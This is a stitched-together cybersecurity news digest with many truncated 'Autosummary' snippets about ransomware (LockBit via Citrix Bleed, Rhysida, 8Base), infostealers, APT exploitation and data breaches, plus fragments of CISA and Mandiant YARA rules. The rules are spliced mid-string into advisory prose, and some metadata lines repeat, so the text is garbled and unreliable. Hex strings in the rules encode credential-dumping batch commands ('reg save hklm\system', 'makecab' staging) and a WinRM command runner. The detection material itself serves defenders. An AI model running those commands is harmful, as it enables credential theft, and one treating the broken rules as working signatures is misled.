The advisory contains a slew of IoCs – IP addresses, domains, (PowerShell) scripts, tools, scheduled tasks, commands and filenames – that organizations can look for to discover whether they are among LockBit’s victims. "Canonical announced chiselled Ubuntu containers which come with Canonical’s security maintenance and support commitment. Chiselled Ubuntu containers are ultra-small OCI images that deliver only the application and its runtime dependencies, and no other operating system-level packages, utilities, or libraries. This makes them lightweight to maintain and operate, secure, and efficient in resource utilisation. Canonical’s chiselled Ubuntu portfolio includes pre-built images for popular toolchains like Java, .NET and Python. The company has been working closely with … More
The post Chiselled Ubuntu closes prevailing container security gaps appeared first on Help Net Security.
"Autosummary:
Key benefits include: Bug-for-bug compatibility of containers and their contents from Developer experience through DevOps and DevSecOps to production, as all the containers are built from the same package contents Smaller containers means fewer dependency headaches across the container CI lifecycle Chisel CLI for an easy, Ubuntu-like experience as customers build or extend chiselled containers themselves using the same tools as Canonical Simple images means simpler image rebuilds Reliable support and release cadence Chiselled Ubuntu images inherit Ubuntu’s long-term support guarantees and are updated within the same release cycle using the self-same packages as within other LTS components. Trusted provenance, optimal developer experience According to GitLab’s 2022 Global DevSecOps Survey, only 64% of security professionals had a security plan for containers, and many DevOps teams don’t have a plan in place for other cutting-edge software technologies, including cloud-native/serverless, APIs, and microservices. "Microsoft has announced a new bug bounty program aimed at unearthing vulnerabilities in Defender-related products and services, and is offering participants the possibility to earn up to $20,000 for the most critical bugs. The Microsoft Defender bug bounty program Microsoft Defender includes various products and services that are build to secure and protect Microsoft users. “The [Microsoft Defender Bounty Program] will begin with a limited scope, focusing on Microsoft Defender for Endpoint APIs, and will … More
The post Microsoft announces Defender bug bounty program appeared first on Help Net Security.
"Autosummary:
"Autosummary:
BeaverTail, the JavaScript implant, is a stealer and a loader that comes with capabilities to steal sensitive information from web browsers and crypto wallets, and deliver additional payloads, including InvisibleFerret, a Python-based backdoor with fingerprinting, remote control, keylogging, and data exfiltration features. "Autosummary:
“We have successfully identified and exploited this vulnerability (a local privilege escalation that grants full root privileges) on the default installations of Fedora 37 and 38, Ubuntu 22.04 and 23.04, and Debian 12 and 13.” reads the post published by Qualys. "Autosummary:
InfectedSlurs operator challenging others to a "bin battle" (Akamai) The user also posted screenshots showing nearly ten thousand bots in the Telnet protocol and another 12,000 on specific device types/brands referred to as "Vacron," "ntel," and "UTT-Bots. "Autosummary:
In mid-October 2023, the Kansas courts authority disclosed a "security incident" that impacted the availability of multiple systems, including the eFiling system attorney"s use for document submission, electronic payment systems, and the case management systems used by district and appellate courts. "Autosummary:
"Autosummary:
New InfectedSlurs Mirai-based botnet exploits two zero-days Pierluigi Paganini November 22, 2023 November 22, 2023 Mirai-based botnet InfectedSlurs has been spotted exploiting two zero-day RCE flaws to compromise routers and video recorder (NVR) devices. "Autosummary:
"Autosummary:
"Autosummary:
"Using social media platforms like WhatsApp and Telegram, attackers are sending messages designed to lure users into installing a malicious app on their mobile device by impersonating legitimate organizations, such as banks, government services, and utilities," Microsoft threat intelligence researchers Abhishek Pustakala, Harshita Tripathi, and Shivang Desai said in a Monday analysis. "Autosummary:
" Mustang Panda, also tracked under the names Bronze President, Camaro Dragon, Earth Preta, RedDelta, and Stately Taurus, is assessed to be a Chinese advanced persistent threat (APT) active since at least 2012, orchestrating cyber espionage campaigns targeting non-governmental organizations (NGOs) and government bodies across North America, Europe, and Asia. "Attackers are exploiting a recently fixed vulnerability (CVE-2023-46604) in Apache ActiveMQ to install Kinsing malware and cryptocurrency miners on targeted Linux systems. CVE-2023-46604 exploitation Apache ActiveMQ is a popular Java-based open source message broker that allows communication between applications and services by translating messages exchanged via different protocols (OpenWire, STOMP, MQTT, AMQP, etc.). CVE-2023-46604 is a vulnerability in the Java OpenWire protocol marshaller and may allow attackers to execute arbitrary code with the same privileges … More
The post Apache ActiveMQ bug exploited to deliver Kinsing malware appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
" First appearing in 2014, Agent Tesla is a keylogger and remote access trojan (RAT) written in .NET that"s offered to other threat actors as part of a malware-as-a-service (MaaS) model. "Autosummary:
Quishing Quishing, a phishing technique resulting from the combination of "QR" and "phishing," has become a popular weapon for cybercriminals in 2023. An email containing a QR code with a malicious link Analyzing a QR code with an embedded malicious link in a safe environment is easy with ANY.RUN: Simply open this task in the sandbox (or upload your file with a QR code). "Autosummary:
Experts warn of a surge in NetSupport RAT attacks against education and government sectors Pierluigi Paganini November 21, 2023 November 21, 2023 Experts warn of a surge in NetSupport RAT attacks against education, government, and business services sectors. "Autosummary:
The data leaked by the cybercriminals is roughly 1.1GB in size, containing employee names, email addresses, parts supply details, tax information, payroll documents, Oracle database files, data about stores, production and sales information, and more. "Autosummary:
"With the capability to provide full root access on popular platforms like Fedora, Ubuntu, and Debian, it"s imperative for system administrators to act swiftly," Qualys" Saeed Abbasi warned. "Autosummary:
It is an advanced modular malware that supports a variety of malicious behaviors, including hVNC for remote access, cryptocurrency mining, reverse shell, keylogging, clipboard stealing, and information stealing (files, browser data). "Autosummary:
"Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances.
This CSA provides TTPs and IOCs obtained from FBI, ACSC, and voluntarily shared by Boeing. Boeing observed LockBit 3.0 affiliates exploiting CVE-2023-4966, to obtain initial access to Boeing Distribution Inc., its parts and distribution business that maintains a separate environment. Other trusted third parties have observed similar activity impacting their organization.
Historically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation. Observed TTPs for LockBit ransomware attacks can vary significantly in observed TTPs.
Citrix Bleed, known to be leveraged by LockBit 3.0 affiliates, allows threat actors to bypass password requirements an "
Autosummary:
rule CISA_10478915_04 : backdoor communicates_with_c2 remote_access { meta: author = "CISA Code & Media Analysis" incident = "10478915" date = "2023-11-06" last_modified = "20231108_1500" actor = "n/a" family = "n/a" capabilities = "communicates-with-c2" malware_type = "backdoor" tool_type = "remote-access" description = "Detects trojan python samples" sha256 = "906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6" strings: $s1 = { 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22 } $s2 = { 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a } $s3 = { 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72 } $s4 = { 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29 } condition: all of them } This file is a Python script called a.py that attempts to leverage WinRM to establish a session."installs-other-components" malware_type = "trojan" tool_type = "unknown" description = "Detects trojan PE32 samples" sha256 = "e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068" strings: $s1 = { 57 72 69 74 65 46 69 6c 65 } $s2 = { 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 } $s3 = { 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74 } $s4 = { 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 } $s5 = { 64 65 6c 65 74 65 5b 5d } $s6 = { 4e 41 4e 28 49 4e 44 29 } condition: uint16(0) == 0x5a4d and pe.imphash() == "6e8ca501c45a9b85fff2378cffaa24b2" and pe.size_of_code == 84480 and all of them } This file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat."steals-authentication-credentials" malware_type = "trojan" tool_type = "credential-exploitation" description = "Detects trojan DLL samples" sha256 = "17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994" strings: $s1 = { 64 65 6c 65 74 65 } $s2 = { 3c 2f 74 72 75 73 74 49 6e 66 6f 3e } $s3 = { 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 } $s4 = { 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78 } $s5 = { 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57 } $s6 = { 47 65 74 54 69 63 6b 43 6f 75 6e 74 } condition: uint16(0) == 0x5a4d and pe.subsystem == pe. Open Source YARA Rule Import "pe" rule M_Hunting_Backdoor_FREEFIRE { meta: author = "Mandiant" description = "This is a hunting rule to detect FREEFIRE samples using OP code sequences in getLastRecord method" md5 = "eb842a9509dece779d138d2e6b0f6949" malware_family = "FREEFIRE" strings: $s1 = { 72 ?? ?? ?? ?? The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances."installs-other-components" malware_Type = "trojan" tool_type = "information-gathering" description = "Detects trojan .bat samples" sha256 = "98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9" strings: $s1 = { 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 7a 2e 74 78 74 } $s2 = { 72 65 67 20 73 61 76 65 20 68 6b 6c 6dThis critical vulnerability exploit impacts the following software versions [1]: NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50 NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15 NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19 NetScaler ADC and NetScaler Gateway version 12.1 (EOL) NetScaler ADC 13.1FIPS before 13.1-37.163 NetScaler ADC 12.1-FIPS before 12.1-55.300 NetScaler ADC 12.1-NDcPP before 12.1-55.300 Due to the ease of exploitation, CISA and the authoring organizations expect to see widespread exploitation of the Citrix vulnerability in unpatched software services throughout both private and public networks. Historically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation."CISA Code & Media Analysis" incident = "10478915" date = "2023-11-06" last_modified = "20231108_1500" actor = "n/a" family = "n/a" capabilities ="CISA Code & Media Analysis" incident = "10478915" date = "2023-11-06" last_modified = "20231108_1500" actor = "n/a" family = "n/a" capabilities ="CISA Code & Media Analysis" incident = "10478915" date = "2023-11-06" last_modified = "20231108_1500" actor = "n/a" family = "n/a" capabilities =This will aid the hunt for suspicious activity such as installing tools on the system (e.g., putty, rClone ), new account creation, log item failure, or running commands such as hostname, quser, whoami, net, and taskkill.5c 73 79 73 74 65 6d 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 65 6d } $s3 = { 6d 61 6b 65 63 61 62 20 63 3a 5c 75 73 65 72 73 5c 70 75 62 6c 69 63 5c 61 2e 70 6e 67 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 61 2e 63 61 62 } condition: all of them } This file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an argument.6F ?? ?? ?? ?? ??7E ?? ?? ?? ?? ??Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring organizations. REFERENCES [1] NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966 [2] Investigation of Session Hijacking via Citrix NetScaler ADC and Gateway Vulnerability (CVE-2023-4966 [3] What is Mshta, How Can it Be Used and How to Protect Against it (McAfee) VERSION HISTORY November 21, 2023: Initial version. REPORTING The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with LockBit 3.0 affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. "Autosummary:
" Lumma announcing new, powerful feature Source: BleepingComputer This new feature was only made available to subscribers of the highest-tier "Corporate" plan, which costs cybercriminals $1,000/month. "Autosummary:
"Autosummary:
" Lumma announcing new, powerful feature Source: BleepingComputer This new feature was only made available to subscribers of the highest-tier "Corporate" plan, which costs cybercriminals $1,000/month. "Autosummary:
"Autosummary:
"Autosummary:
"Cybercriminals have evolved into organized and highly adaptive networks, collaborating globally to exploit weaknesses in cybersecurity defenses. Their motivations range from financial gain and information theft to political espionage and ideological warfare. Cybercriminals, now more than ever, are exploiting vulnerabilities in cybersecurity defenses and constantly shaping their strategies in response to technological advancements. In this Help Net Security round-up, we present segments from previously recorded videos in which cybersecurity experts discuss the tactics and techniques … More
The post Outsmarting cybercriminals is becoming a hard thing to do appeared first on Help Net Security.
"Autosummary:
"PortDroid PortDroid is a trusted app for all network analysis tasks. Designed with network administrators, penetration testers, and technology enthusiasts in mind, this app brings a collection of essential networking tools right at your fingertips. Deal: 50% off Promo code: CYBER_2023 7ASecurity 7ASecurity offers IT security training courses including Android, iOS, Node.js, Electron, Secure Development, and security awareness. Deal: 50% off on any course Promo code: BFCM50 LetsDefend LetsDefend helps you build a blue team … More
The post 9 Black Friday cybersecurity deals you don’t want to miss appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Multiple APT groups have been observed exploiting the CVE-2023-38831 vulnerability, including Dark Pink, APT28, APT29, Sandworm, APT40, Ghostwriter, and Konni. "CISA has added three vulnerabilities to its Known Exploited Vulnerabilities catalog, among them a critical vulnerability (CVE-2023-1671) in Sophos Web Appliance that has been patched by the company in April 2023. About CVE-2023-1671 CVE-2023-1671 is a pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance that allows attackers to execute arbitrary code. Sophos Web Appliance is a web gateway appliance that functions as a web proxy and scans potentially harmful content for … More
The post Sophos Web Appliance vulnerability exploited in the wild (CVE-2023-1671) appeared first on Help Net Security.
"Autosummary:
"Resecurity announced a strategic partnership with University of Jeddah, one of the leaders in higher education in the Kingdom of Saudi Arabia, to further strengthen the country’s cybersecurity talent pipeline and facilitate capacity building programs for academia. This landmark partnership aims to enhance cybersecurity education by delivering cutting-edge training programs and fostering collaboration in key areas of expertise. Recognizing the evolving landscape of cybersecurity threats, Resecurity and the University of Jeddah aim to equip students … More
The post Resecurity partners with University of Jeddah to improve cybersecurity education appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Once all the five cursor positions (P0, P1, P2, P3, and P4) meet the requirements, LummaC2 treats them as Euclidean vectors and calculates the angle that"s formed between two consecutive vectors (P01-P12, P12-P23, and P23-P34). "Autosummary:
Russia-linked APT29 group exploited WinRAR 0day in attacks against embassies Pierluigi Paganini November 20, 2023 November 20, 2023 Russia-linked cyberespionage group APT29 has been observed leveraging the CVE-2023-38831 vulnerability in WinRAR in recent attacks. "Autosummary:
"Autosummary:
“In the context of Kinsing, CVE-2023-46604 is exploited to download and execute Kinsing cryptocurrency miners and malware on a vulnerable system” - Trend Micro The malware uses the ‘ProcessBuilder’ method to execute malicious bash scripts and download additional payloads on the infected device from within newly created system-level processes. "Autosummary:
"Threat actors leveraging Rhysida ransomware are known to impact "targets of opportunity," including victims in the education, healthcare, manufacturing, information technology, and government sectors," the two agencies said. "Autosummary:
Crypter requirement highlighted in a forum post (Outpost24) As a last line of defense against scrutiny, Lumma 4.0 incorporates obstacles within its code, like opaque predicates that unnecessarily complicate the program"s logic, and blocks of dead code injected within functional code segments to create confusion and analysis errors. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
For example, when REvil"s precursor, GandCrab, was released, the threat actors named their command and control servers after BleepingComputer, Emsisoft, ESET, and NoMoreRansom. "Autosummary:
"Autosummary:
“Sirva.com says that all their information worth only $1m. We have over 1.5TB of documents leaked + 3 full backups of CRM for branches (eu, na and au) Sirva Worldwide, Inc. provides HR and mobility professionals with the resources, guidance, and support they need to achieve the best possible relocation for talent, and for the companies that move them.” reads the sattement published by Lockbit on its Tor leaksite that confirms the failure of a negotiation. "Autosummary:
While our website is unavailable following a major technology outage caused by a cyber-attack, we’re keeping our blog up to date with what’s on at the Library: https://t.co/8tzhn37lew We’ve just uploaded more events up until 14 December, including our current season of Fantasy… pic.twitter.com/742E11oUOn — British Library (@britishlibrary) November 17, 2023 Three hours ago the British Library said that it is continuing to experience a major technology outage that is impacting its website, online systems and services, and some on-site services. “Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. The ransomware gang hit organizations in multiple industries, including the education, healthcare, manufacturing, information technology, and government sectors. "Autosummary:
Malware researchers saw indications of compromise in the United States, Ukraine, Germany, Vietnam, Poland, Chile, and Hong Kong, which suggests that the threat group lost control of LittleDrifter, which reached unintended targets. "Autosummary:
CISA and the FBI consider Scattered Spider to be experts that use multiple social engineering techniques, especially phishing, push bombing, and SIM swap attacks, to obtain credentials, install remote access tools, and bypass multi-factor authentication (MFA).Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Once the groups establish access, Scattered Spider often searches the victim’s Slack, Microsoft Teams, and Microsoft Exchange online for emails or conversations regarding the intrusion, along with any security response to see if their attack has been discovered. "Autosummary:
The group has been active since March 2022, it focused on small and medium-size businesses in multiple industries, including finance, manufacturing, business services, and IT. Pierluigi Paganini November 19, 2023 November 19, 2023 8Base ransomware operators were observed using a variant of the Phobos ransomware in a recent wave of attacks. "Autosummary:
Lure from Russian APT28 hackers with WinRAR exploit to target political entities source: ESET A report from Google in October notes that the security issue was exploited by Russian and Chinese state hackers to steal credentials and other sensitive data, as well as to establish persistence on target systems. "Autosummary:
"Autosummary:
"Autosummary:
The intrusions, attributed to APT29 (aka BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock, Midnight Blizzard, and The Dukes), involve the exploitation of the recently disclosed WinRAR vulnerability (CVE-2023-38831) via benign-looking lures that claim to offer BMWs for sale, a theme it has employed in the past. "Autosummary:
"It implies, however, that once the private RSA key is known, any file encrypted by any Phobos variant since 2019 can reliably be decrypted." Phobos, which first emerged in 2019, is an evolution of the Dharma (aka Crysis) ransomware, with the ransomware predominantly manifesting as the variants Eking, Eight, Elbie, Devos, and Faust, based on the volume of artifacts unearthed on VirusTotal." "Establish a minimum ransom request depending on the company"s yearly revenue, for example at 3%, and prohibit discounts of more than 50%," the LockBit operators said, according to a detailed report from Analyst1. "Autosummary:
Gamaredon (aka Shuckworm, Actinium, Armageddon, Primitive Bear, UAC-0010, and Trident Ursa) has been active since 2014 and its activity focuses on Ukraine, the group was observed using the multistage backdoor Pteranodon/Pterodo. Check Point researchers reported possible infections also in the U.S., Vietnam, Chile, Poland, Germany, and Hong Kong. "Autosummary:
Next, the attackers overwrite session data using Java"s "putAll()" function, enabling the impersonation of "administrators," and leverage the "drain_log()" function to manipulate files as needed to maintain stealthiness. "An attack path is important to prioritize potential risks in cloud environments. The attack path offers the ability to look at cloud environments from the attacker’s perspective. With today’s general awareness and concerted effort toward cybersecurity, cybercriminals rarely find a single gaping loophole or a silver bullet through which an entire enterprise system is compromised. Instead, they often capitalize on a series of vulnerabilities that successively lead them to discover an exploitable path to confidential … More
The post Transforming cybersecurity from reactive to proactive with attack path analysis appeared first on Help Net Security.
"Autosummary:
"Automated attacks on application business logic, carried out by sophisticated bad bots, were the leading threat for online retailers, according to Imperva. In addition, account takeover, DDoS, API abuse, and client-side attacks were significant risks. The ecommerce industry remains a lucrative target for cybercriminal activity. Built on a vast network of API connections and third-party dependencies, online retailers are increasingly vulnerable to business logic abuse and client-side attacks. Motivated cybercriminals are also eager to compromise … More
The post Rise in automated attacks troubles ecommerce industry appeared first on Help Net Security.
"Autosummary:
“The security risks that the retail industry faces are more sophisticated, automated, and harder to detect,” says Karl Triebes, SVP and GM, Application Security, Imperva. Security incidents spike amid shopping season A successful security incident can lead to higher infrastructure and support costs, degraded online services, and, ultimately, customer churn. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
" While the attackers deployed ransomware payloads on the library"s systems on Saturday, October 28, the IT outage continues to impact the British Library"s website, online systems, services, and certain onsite facilities such as Wi-Fi. "Autosummary:
"The malicious advertisement directs the user to a compromised WordPress website gameeweb[.]com, which redirects the user to an attacker-controlled phishing site," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News. "Autosummary:
"Autosummary:
"One of the servers managed by [..] motorcycle manufacturing and sales subsidiary in the Philippines, Yamaha Motor Philippines, Inc. (YMPH), was accessed without authorization by a third party and hit by a ransomware attack, and a partial leakage of employees" personal information stored by the company was confirmed," Yamaha said. "Autosummary:
Attack and response timeline According to Google"s threat analysts, the threat actors exploited the vulnerability on government systems in Greece, Moldova, Tunisia, Vietnam, and Pakistan to steal email data, user credentials, and authentication tokens, perform email forwarding, and lead victims to phishing pages. "Autosummary:
The U.S. Cybersecurity & Infrastructure Security Agency has added to its catalog of known exploited vulnerabilities (KEV) three security issues that affect Microsoft devices, a Sophos product, and an enterprise solution from Oracle. "Autosummary:
The referenced item (Form 8-K Item 1.05) states: “Registrants must disclose any cybersecurity incident they experience that is determined to be material, and describe the material aspects of its: – Nature, scope, and timing; and – Impact or reasonably likely impact.Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.It has come to our attention that MeridianLink, in light of a significant breach compromising customer data and operational information, has failed to file the requisite disclosure under Item 1.05 of Form 8-K within the stipulated four business days, as mandated by the new SEC rules.” "We are now in the third decade of Microsoft"s monthly Patch Tuesday releases, which deliver fewer critical updates to browsers and Windows platforms — and much more reliable updates to Microsoft Office — than in the early days of patching. But this month, the company rolled out 63 updates (including fixes for three zero-days in Windows and Office).
Updates to Microsoft Exchange and Visual Studio can be included in standard patch release cycles, while Adobe needs to be included in your "Patch Now" releases for third-party applications.
The team at Readiness has provided a detailed infographic that outlines the risks associated with each of the updates for November.
Autosummary:
Major revisions At this point, Microsoft has published three major revisions that require attention for this cycle, including: CVE-2023-36008: Microsoft Edge (Chromium-based) Windows Microsoft released two critical updates and 30 patches rated important to the Windows platform that cover the following key components: Windows Hyper-V. Windows Internet Connection Sharing (ICS). Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge).All four issues (CVE-2023-36439, CVE-2023-36050, CVE-2023-36039 and CVE-2023-36035) require full administrator access and as of now have not been reported as exploited or publicly reported. Mitigations and workarounds Microsoft published the following vulnerability-related mitigations for this Patch Tuesday release: CVE-2023-38151: Microsoft Host Integration Server 2020 Remote Code Execution Vulnerability. Our testing process raises a few concerns when the Windows file system has been updated, so we have included a few additional steps to validate this month"s changes: Run Storage Sense (this may be your first time). "Autosummary:
Medusa ransomware gang claims the hack of Toyota Financial Services Pierluigi Paganini November 17, 2023 November 17, 2023 Toyota Financial Services discloses unauthorized activity on systems after the Medusa ransomware gang claimed to have hacked the company. "Autosummary:
We also learned more about recent attacks and tactics used by ransomware threat actors, which are highlighted below: Contributors and those who provided new ransomware information and stories this week include: @serghei, @demonslay335, @billtoulas, @fwosar, @Seifreed, @malwrhunterteam, @BleepinComputer, @Ionut_Ilascu, @LawrenceAbrams, @GossiTheDog, @BrettCallow, @PogoWasRight, @pcrisk, and @NCCGroupInfosec. November 14th 2023 The Lockbit ransomware attacks use publicly available exploits for the Citrix Bleed vulnerability (CVE-2023-4966) to breach the systems of large organizations, steal data, and encrypt files. "Autosummary:
" Hijacked Bloomberg Crypto account (BleepingComputer) Upon entering the Discord server, a bot prompts visitors to use AltDentifier, an authentic Discord Verification Bot. Rather than linking to the legitimate https://altdentifier.com/ address, it presents a link to a deceptive page using an altered domain (altdentifiers[.]com) with an extra "s" at the end of the original domain name. "Autosummary:
“Based on our investigation to date, we have identified no evidence of unauthorized access to our production platforms, and the incident has caused minimal business interruption.” - MeridianLink While many ransomware and extortion gangs have threatened to report breaches and data theft to the SEC, this may be the first public confirmation that they have done so. "Autosummary:
These attacks are suspected to have weaponized two more critical bugs in Zyxel gear (CVE-2023-33009 and CVE-2023-33010, CVSS scores: 9.8) as zero-days to co-opt the firewalls into Mirai and MooBot botnets, given that patches for them were released by the company on May 24, 2023. "Autosummary:
“Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors.“Additionally, open source reporting[2] has confirmed observed instances of Rhysida actors operating in a ransomware-as-a-service (RaaS) capacity, where ransomware tools and infrastructure are leased out in a profit-sharing model. "Autosummary:
According to statistics compiled by Malwarebytes, Rhysida has claimed five victims for the month of October 2023, putting it far behind LockBit (64), NoEscape (40), PLAY (36), ALPHV/BlackCat (29), and 8BASE (21). "Autosummary:
"Starting from a single compromised machine, threat actors could progress in several ways: they could move to other cloned machines with GCPW installed, gain access to the cloud platform with custom permissions, or decrypt locally stored passwords to continue their attack beyond the Google ecosystem," Martin Zugec, technical solutions director at Bitdefender, said in a new report. "Autosummary:
It is used in businesses of all sizes in the healthcare, financial, retail, e-commerce, government, and public sectors. "Autosummary:
Now you can enable Emergency SOS In Safety & emergency, toggle the Use Emergency SOS and set the Use Emergency SOS slider to enabled Confirm the setting and select what information you want to share. The alarm button systems are used in situations where people that require care are not constantly surrounded by caregivers, like care homes that provide independent living, elderly who live at home but need the ability to call for help, and people with a heightened risk of falling. "Autosummary:
"The discovery of at least four campaigns exploiting CVE-2023-37580, three campaigns after the bug first became public, demonstrates the importance of organizations applying fixes to their mail servers as soon as possible," TAG said. "Autosummary:
" Multiple threat actors have joined the CVE-2023-38831 exploitation bandwagon in recent months, including APT28, APT40, Dark Pink, Ghostwriter, Konni, and Sandworm. "Autosummary:
The security breach was discovered on November 13, 2023, and impacted customers who made purchases from the Samsung UK online store between July 1, 2019, and June 30, 2020.The previous one occurred in late July, 2023 – discovered on August 4, when hackers accessed and stole Samsung customers’ names, contacts and demographic information, dates of birth, and product registration data. "Autosummary:
To prove the intrusion, the hackers published sample data that includes financial documents, spreadsheets, purchase invoices, hashed account passwords, cleartext user IDs and passwords, agreements, passport scans, internal organization charts, financial performance reports, staff email addresses, and more. "Autosummary:
Google Threat Analysis Group (TAG) researchers revealed that a zero-day vulnerability, tracked as CVE-2023-37580 (CVSS score: 6.1), in the Zimbra Collaboration email software was exploited by four different threat actors to steal email data, user credentials, and authentication tokens from government organizations. "Autosummary:
Emsisoft threat analyst Brett Callow, who tracks attacks on local government in the United States, told BleepingComputer that if this turns out to be ransomware, it would be the 80th local government to suffer a ransomware attack in 2023. "Autosummary:
Scattered Spider, also known as 0ktapus, Starfraud, UNC3944, Scatter Swine, Octo Tempest, and Muddled Libra, is adept at social engineering and relies on phishing, multi-factory authentication push bombing (targeted MFA fatigue), and SIM swapping to gain initial network access on large organizations.Remote web server access via internet tunneling Pulseway : Remote system monitoring and management : Remote system monitoring and management Screenconnect : Network device remote connection management : Network device remote connection management Splashtop : Network device remote connection management : Network device remote connection management Tactical. "Organizations reliance on technology has contributed to the fact that their attack surface has grown in size and complexity, according to Armis. Global organizations are facing an unprecedented level of cyber risk due to blind spots in their environment and that security teams are being overwhelmed with significant amounts of threat intelligence data lacking actionable insights. As a result, 61% of organizations confirmed they had been breached at least once over the last 12 months, … More
The post Organizations should prepare for the inevitability of cyberattacks on their infrastructure appeared first on Help Net Security.
"Autosummary:
“Armis continues to warn about the evolving threat landscape and the impact of malicious cyberattacks targeting global organizations, national governments, state and local entities and society overall,” said Curtis Simpson, CISO, Armis. "Autosummary:
"Autosummary:
"Autosummary:
"Resecurity, Inc. (USA) protecting major Fortune 100 and government agencies globally has identified an alarming rise in ransomware operators targeting the energy sector, including nuclear facilities and related research entities. Over the last year, ransomware attackers have targeted energy installations in North America, Asia, and the European Union. In the EU, Handelsblatt reported that ransomware attacks targeting the energy sector more than doubled in 2022 over the previous year, with defenders recording 21 attacks through … More
The post Nuclear and oil & gas are major targets of ransomware groups in 2024 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
